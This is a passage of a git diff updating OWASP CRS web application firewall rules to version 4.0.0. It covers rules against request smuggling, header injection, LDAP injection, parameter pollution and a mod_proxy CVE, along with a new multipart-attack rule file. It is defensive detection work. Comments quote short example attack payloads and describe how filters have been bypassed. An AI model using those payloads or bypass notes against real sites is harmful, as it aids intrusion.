setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'" # -=[ Abnormal Character Escapes ]=- # @@ -1570,13 +1886,12 @@ SecRule REQUEST_HEADERS:Sec-Fetch-User "@validateByteRange 32,34,38,42-59,61,63, # This rule is also triggered by the following exploit(s): # [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] # -SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@rx (?:^|[^\\\\])\\\\[cdeghijklmpqwxyz123456789]" \ +SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@rx (?:^|[^\x5c])\x5c[cdeghijklmpqwxyz123456789]" \ "id:920460,\ phase:2,\ block,\ capture,\ - t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,\ - log,\ + t:none,t:htmlEntityDecode,t:lowercase,\ msg:'Abnormal character escapes in request',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ @@ -1586,11 +1901,10 @@ SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@rx (?:^|[^\\\\])\\\\[cdegh tag:'paranoia-level/4',\ tag:'OWASP_CRS',\ tag:'capec/1000/153/267',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl4=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'" # diff --git a/rules/REQUEST-921-PROTOCOL-ATTACK.conf b/rules/REQUEST-921-PROTOCOL-ATTACK.conf index 9861144ef2..545d52fd0c 100644 --- a/rules/REQUEST-921-PROTOCOL-ATTACK.conf +++ b/rules/REQUEST-921-PROTOCOL-ATTACK.conf @@ -1,8 +1,9 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 +# OWASP CRS ver.4.0.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2024 CRS project. All rights reserved. # -# The OWASP ModSecurity Core Rule Set is distributed under +# The OWASP CRS is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ @@ -13,10 +14,10 @@ -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:921011,phase:1,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:921012,phase:2,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:921011,phase:1,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:921012,phase:2,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" # -# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) +# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # # @@ -30,12 +31,12 @@ SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:921012,phase:2,pass,nolog,skipAf # [ References ] # http://projects.webappsec.org/HTTP-Request-Smuggling # -SecRule ARGS_NAMES|ARGS|REQUEST_BODY|XML:/* "@rx (?:get|post|head|options|connect|put|delete|trace|track|patch|propfind|propatch|mkcol|copy|move|lock|unlock)\s+(?:\/|\w)[^\s]*(?:\s+http\/\d|[\r\n])" \ +SecRule ARGS_NAMES|ARGS|REQUEST_BODY|XML:/* "@rx (?:get|post|head|options|connect|put|delete|trace|track|patch|propfind|propatch|mkcol|copy|move|lock|unlock)\s+[^\s]+\s+http/\d" \ "id:921110,\ phase:2,\ block,\ capture,\ - t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,\ + t:none,t:htmlEntityDecode,t:lowercase,\ msg:'HTTP Request Smuggling Attack',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ @@ -45,18 +46,17 @@ SecRule ARGS_NAMES|ARGS|REQUEST_BODY|XML:/* "@rx (?:get|post|head|options|connec tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220/33',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # -=[ HTTP Response Splitting ]=- # # [ Rule Logic ] # These rules look for Carriage Return (CR) %0d and Linefeed (LF) %0a characters. -# These characters may cause problems if the data is returned in a respones header and +# These characters may cause problems if the data is returned in a response header and # may be interpreted by an intermediary proxy server and treated as two separate # responses. # @@ -68,7 +68,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME phase:2,\ block,\ capture,\ - t:none,t:urlDecodeUni,t:lowercase,\ + t:none,t:lowercase,\ msg:'HTTP Response Splitting Attack',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ @@ -78,11 +78,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220/34',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:\bhttp/\d|<(?:html|meta)\b)" \ @@ -90,7 +89,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME phase:2,\ block,\ capture,\ - t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,\ + t:none,t:htmlEntityDecode,t:lowercase,\ msg:'HTTP Response Splitting Attack',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ @@ -100,11 +99,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220/34',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # -=[ HTTP Header Injection ]=- @@ -122,7 +120,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME # SecRule REQUEST_HEADERS_NAMES|REQUEST_HEADERS "@rx [\n\r]" \ "id:921140,\ - phase:2,\ + phase:1,\ block,\ capture,\ t:none,t:htmlEntityDecode,\ @@ -135,11 +133,10 @@ SecRule REQUEST_HEADERS_NAMES|REQUEST_HEADERS "@rx [\n\r]" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220/273',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # Detect newlines in argument names. @@ -154,7 +151,7 @@ SecRule ARGS_NAMES "@rx [\n\r]" \ phase:2,\ block,\ capture,\ - t:none,t:urlDecodeUni,t:htmlEntityDecode,\ + t:none,t:htmlEntityDecode,\ msg:'HTTP Header Injection Attack via payload (CR/LF detected)',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ @@ -164,11 +161,10 @@ SecRule ARGS_NAMES "@rx [\n\r]" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220/33',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule ARGS_GET_NAMES|ARGS_GET "@rx [\n\r]+(?:\s|location|refresh|(?:set-)?cookie|(?:x-)?(?:forwarded-(?:for|host|server)|host|via|remote-ip|remote-addr|originating-IP))\s*:" \ @@ -176,7 +172,7 @@ SecRule ARGS_GET_NAMES|ARGS_GET "@rx [\n\r]+(?:\s|location|refresh|(?:set-)?cook phase:1,\ block,\ capture,\ - t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,\ + t:none,t:htmlEntityDecode,t:lowercase,\ msg:'HTTP Header Injection Attack via payload (CR/LF and header-name detected)',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ @@ -186,17 +182,17 @@ SecRule ARGS_GET_NAMES|ARGS_GET "@rx [\n\r]+(?:\s|location|refresh|(?:set-)?cook tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220/33',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # -=[ HTTP Splitting ]=- # # This rule detect \n or \r in the REQUEST FILENAME -# Reference: https://www.owasp.org/index.php/Testing_for_HTTP_Splitting/Smuggling_(OTG-INPVAL-016) +# Reference: https://wiki.owasp.org/index.php/Testing_for_HTTP_Splitting/Smuggling_(OTG-INPVAL-016) +# Reference: https://owasp.org/www-project-web-security-testing-guide/assets/archive/OWASP_Testing_Guide_v4.pdf # SecRule REQUEST_FILENAME "@rx [\n\r]" \ "id:921190,\ @@ -212,11 +208,10 @@ SecRule REQUEST_FILENAME "@rx [\n\r]" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220/34',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # @@ -229,7 +224,7 @@ SecRule REQUEST_FILENAME "@rx [\n\r]" \ # # [ References ] # * https://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf -# * https://blog.ripstech.com/2017/joomla-takeover-in-20-seconds-with-ldap-injection-cve-2017-14596/ +# * https://www.sonarsource.com/blog/joomla-takeover-in-20-seconds-with-ldap-injection-cve-2017-14596/ # * https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/276#issue-126581660 SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ^[^:\(\)\&\|\!\<\>\~]*\)\s*(?:\((?:[^,\(\)\=\&\|\!\<\>\~]+[><~]?=|\s*[&!|]\s*(?:\)|\()?\s*)|\)\s*\(\s*[\&\|\!]\s*|[&!|]\s*\([^\(\)\=\&\|\!\<\>\~]+[><~]?=[^:\(\)\&\|\!\<\>\~]*)" \ @@ -243,18 +238,77 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'application-multi',\ tag:'language-ldap',\ tag:'platform-multi',\ + tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/136',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# -=[ Body Processor Bypass ]=- +# +# [ Rule Logic ] +# +# This rule intends to detect content types in the Content-Type header outside of the actual content type declaration. +# This prevents bypasses targeting the Modsecurity recommended rules controlling which body processor is used. +# +# Regular expression generated from regex-assembly/921421.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 921421 +# +SecRule REQUEST_HEADERS:Content-Type "@rx ^[^\s\v,;]+[\s\v,;].*?(?:application/(?:.+\+)?json|(?:application/(?:soap\+)?|text/)xml)" \ + "id:921421,\ + phase:1,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'Content-Type header: Dangerous content type outside the mime type declaration',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153',\ + tag:'PCI/12.1',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# Rule against CVE-2021-40438: +# A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the remote user. +# This issue affects Apache HTTP Server 2.4.48 and earlier. +# GET /?unix:AAAAAAAAAAAAA|http://coreruleset.org/ +# +SecRule REQUEST_URI "@rx unix:[^|]*\|" \ + "id:921240,\ + phase:1,\ + block,\ + capture,\ + t:none,t:urlDecode,t:lowercase,\ + msg:'mod_proxy attack attempt detected',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-apache',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272/220/33',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:921013,phase:1,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:921014,phase:2,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:921013,phase:1,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:921014,phase:2,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" # -# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # @@ -266,7 +320,7 @@ SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:921014,phase:2,pass,nolog,skipAf # SecRule ARGS_GET "@rx [\n\r]" \ "id:921151,\ - phase:2,\ + phase:1,\ block,\ capture,\ t:none,t:urlDecodeUni,t:htmlEntityDecode,\ @@ -279,19 +333,82 @@ SecRule ARGS_GET "@rx [\n\r]" \ tag:'paranoia-level/2',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220/33',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# +# -=[ Body Processor Bypass ]=- +# +# [ Rule Logic ] +# +# This rule intends to detect content types in the Content-Type header outside of the actual content type declaration. +# +# [ References ] +# * See rule 921422 +# +# Regular expression generated from regex-assembly/921422.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 921422 +# +SecRule REQUEST_HEADERS:Content-Type "@rx ^[^\s\v,;]+[\s\v,;].*?\b(?:((?:tex|multipar)t|application)|((?:audi|vide)o|image|cs[sv]|(?:vn|relate)d|p(?:df|lain)|json|(?:soa|cs)p|x(?:ml|-www-form-urlencoded)|form-data|x-amf|(?:octe|repor)t|stream)|([\+/]))\b" \ + "id:921422,\ + phase:1,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'Content-Type header: Dangerous content type outside the mime type declaration',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153',\ + tag:'PCI/12.1',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:921015,phase:1,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:921016,phase:2,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:921015,phase:1,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:921016,phase:2,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +# +# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) +# # -# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) + +# Forbid Request Range Header # +# It is possible abuse the HTTP Request Range Header to leak error pages +# and other information in very small snippets. +# The easiest way to fight this is to deny the use of this header. +# This is a viable option since the header is only used in rare circumstances +# anymore. +# If it is necessary to use it in a certain setup, then it is best to +# create a rule exclusion for a given URI and this rule ID as a workaround. # +SecRule &REQUEST_HEADERS:Range "@gt 0" \ + "id:921230,\ + phase:1,\ + block,\ + t:none,\ + msg:'HTTP Range Header detected',\ + logdata:'Matched Data: Header %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/3',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272/220',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + # -=[ HTTP Parameter Pollution ]=- # @@ -320,10 +437,9 @@ SecRule ARGS_NAMES "@rx ." \ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ - tag:'paranoia-level/3',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/137/15/460',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ setvar:'TX.paramcounter_%{MATCHED_VAR_NAME}=+1'" SecRule TX:/paramcounter_.*/ "@gt 1" \ @@ -339,21 +455,103 @@ SecRule TX:/paramcounter_.*/ "@gt 1" \ tag:'OWASP_CRS',\ tag:'capec/1000/152/137/15/460',\ tag:'paranoia-level/3',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ chain" SecRule MATCHED_VARS_NAMES "@rx TX:paramcounter_(.*)" \ "capture,\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" +# -=[ HTTP Parameter Pollution ]=- +# +# [ Rule Logic ] +# Parameter pollution rule 921180 PL3 can by bypassed when a weak backend parameter +# parser is ignoring additional characters in a parameter array name after the +# closing of the array. +# Rule 921210 PL3 prevents this by disallowing arbitrary strings after an array has +# been closed or inbetween the square brackets in multidimensional arrays. +# Please note that rule 921210 allows for 2-dimensional, but not for higher dimensional +# arrays. If these are flagged as attacks, a rule exclusion will have to be +# deployed; ideally for the parameter(s) in question. +# +# [ References ] +# Private bug bounty in Spring 2022, findings Z05OZUCH. +# +# [ Payloads ] +# * foo[1]a=bar&foo[1]b= - parameter parsers often cut after the closing of +# the array. 921180 PL3 takes the full name, though. +# This impediance mismatch allows for bypasses. +# * foo[1]x[1]=bar&foo[1]x[2]= - extension of 1; this has the advantage that +# the parameter name does end with "]" just like a valid array notation. +# +SecRule ARGS_NAMES "@rx (][^\]]+$|][^\]]+\[)" \ + "id:921210,\ + phase:2,\ + pass,\ + log,\ + msg:'HTTP Parameter Pollution after detecting bogus char after parameter array',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/137/15/460',\ + tag:'paranoia-level/3',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:921017,phase:1,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:921018,phase:2,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:921017,phase:1,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:921018,phase:2,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +# +# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) +# + +# -=[ HTTP Parameter Pollution ]=- +# +# [ Rule Logic ] +# Parameter pollution rule 921180 PL3 and 921210 PL3 can by bypassed if a +# weak backend parameter parser ignores parameter array alltogether at +# cuts parameter names at the first occurrence of the "[" character. +# The rule 921220 PL4 prevents this by disallowing parameter array names. # -# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) +# If an application needs parameter array names, then this rule should be +# disabled, ideally by issueing a rule exclusion for the parameter names +# that need it. # +# [ References ] +# Private bug bounty in Spring 2022, finding 5UXE4RK0. +# +# [ Payloads ] +# * foo[1]=bar&foo[2]= +# * foo=bar&foo[1]= +# * foo[1]=bar&foo[1]acb]= - this is an edge case that 921210 PL3 is not +# able to catch since the parameter name ends with "]". +# +SecRule ARGS_NAMES "@rx \[" \ + "id:921220,\ + phase:2,\ + pass,\ + log,\ + msg:'HTTP Parameter Pollution possible via array notation',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/137/15/460',\ + tag:'paranoia-level/4',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'" diff --git a/rules/REQUEST-922-MULTIPART-ATTACK.conf b/rules/REQUEST-922-MULTIPART-ATTACK.conf new file mode 100644 index 0000000000..5ba40a580b --- /dev/null +++ b/rules/REQUEST-922-MULTIPART-ATTACK.conf @@ -0,0 +1,97 @@ +# ------------------------------------------------------------------------ +# OWASP CRS ver.4.0.0 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2024 CRS project. All rights reserved. +# +# The OWASP CRS is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + +# +# -= Paranoia Level 0 (empty) =- (apply unconditionally) +# + +# This file is to address the 3UWMWA6W vulnerability. +# It requires ModSecurity version 2.9.6 or 3.0.8 (or an updated version with backports +# of the security fixes in these versions) or a compatible engine supporting these changes. +# +# If you cannot upgrade ModSecurity, this file will cause ModSecurity to fail to start. +# In that case, you can temporarily delete this file. However, you will be missing +# protection from these rules. Therefore, we recommend upgrading your engine instead. + +# The rules in this file will be part of the 920 / 921 in the future. + +# Only allow specific charsets when using "_charset_" +# Note: this is in phase:2 because these are headers that come in the body +SecRule &MULTIPART_PART_HEADERS:_charset_ "!@eq 0" \ + "id:922100,\ + phase:2,\ + block,\ + t:none,\ + msg:'Multipart content type global _charset_ definition is not allowed by policy',\ + logdata:'Matched Data: %{ARGS._charset_}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-multipart-header',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153',\ + tag:'paranoia-level/1',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.922100_charset=|%{ARGS._charset_}|',\ + chain" + SecRule TX:922100_CHARSET "!@within %{tx.allowed_request_content_type_charset}" \ + "t:lowercase,\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# Only allow specific charsets same as Rule 920600 +# Note: this is in phase:2 because these are headers that come in the body +# +# Regular expression generated from regex-assembly/922110-chain1.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 922110-chain1 +SecRule MULTIPART_PART_HEADERS "@rx ^content-type\s*:\s*(.*)$" \ + "id:922110,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'Illegal MIME Multipart Header content-type: charset parameter',\ + logdata:'Matched Data: %{TX.1} found within Content-Type multipart form',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/272/220',\ + tag:'paranoia-level/1',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + chain" + SecRule TX:1 "!@rx ^(?:(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)/(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)|\*)(?:[\s\v]*;[\s\v]*(?:charset[\s\v]*=[\s\v]*\"?(?:iso-8859-15?|utf-8|windows-1252)\b\"?|(?:[^\s\v -\"\(-\),/:-\?\[-\]c\{\}]|c(?:[^!-\"\(-\),/:-\?\[-\]h\{\}]|h(?:[^!-\"\(-\),/:-\?\[-\]a\{\}]|a(?:[^!-\"\(-\),/:-\?\[-\]r\{\}]|r(?:[^!-\"\(-\),/:-\?\[-\]s\{\}]|s(?:[^!-\"\(-\),/:-\?\[-\]e\{\}]|e[^!-\"\(-\),/:-\?\[-\]t\{\}]))))))[^!-\"\(-\),/:-\?\[-\]\{\}]*[\s\v]*=[\s\v]*[^!\(-\),/:-\?\[-\]\{\}]+);?)*(?:[\s\v]*,[\s\v]*(?:(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)/(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)|\*)(?:[\s\v]*;[\s\v]*(?:charset[\s\v]*=[\s\v]*\"?(?:iso-8859-15?|utf-8|windows-1252)\b\"?|(?:[^\s\v 